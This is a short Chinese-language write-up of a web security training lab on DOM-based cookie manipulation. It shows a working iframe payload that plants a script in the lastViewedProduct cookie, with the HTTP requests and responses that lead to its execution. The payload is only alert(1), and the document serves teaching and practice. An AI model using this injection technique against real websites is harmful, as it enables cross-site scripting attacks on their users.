DOM XSS to cookie

讀取source沒過濾就把他寫到document.cookie,攻擊者可以操作cookie內容

舉例如下,目標網站的cookie使用的 lastViewedProduct,會儲存使用者造訪的最後一個產品頁面的URL

############## request ##############
GET /product?productId=1 HTTP/1.1
...omit...
Cookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=2

############## response ##############
...omit...
<a href='https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=2'>Last viewed product</a><p>|</p>
...omit...

lastViewedProduct的javascript處理如下,url會存進lastViewedProduct

<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
<div class="is-linkback">
<a href="/">Return to list</a>
</div>

準備一個攻擊頁面讓受害者訪問,內容如下

<iframe src="https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1&'><script>alert(1)</script>" onload="if(!window.x)this.src='https://ace51f041ea0fde18050178d00580093.web-security-academy.net';window.x=1;">

當iframe第一次載入時,瀏覽器會暫時開啟惡意URL,然後將此URL位置儲存在lastViewedProduct的cookie

############## request ##############
GET /product?productId=1&%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
...omit...
Cookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1

############## request ##############
...omit...
<a href='https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1'>Last viewed product</a><p>|</p>
...omit...

接著onload 事件處理程序確保受害者立即重定向到主頁,如下

############## request ##############
GET / HTTP/1.1
...omit...
Cookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1&%27%3E%3Cscript%3Ealert(1)%3C/script%3E

############## request ##############
...omit...
<a href='https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1&'><script>alert(1)</script>'>Last viewed product</a><p>|</p>
...omit...

由於cookie中的lastViewedProduct值會變成返回內容的一部份,因此使用者端會執行<script>alert(1)</script>

Lab: DOM-based cookie manipulation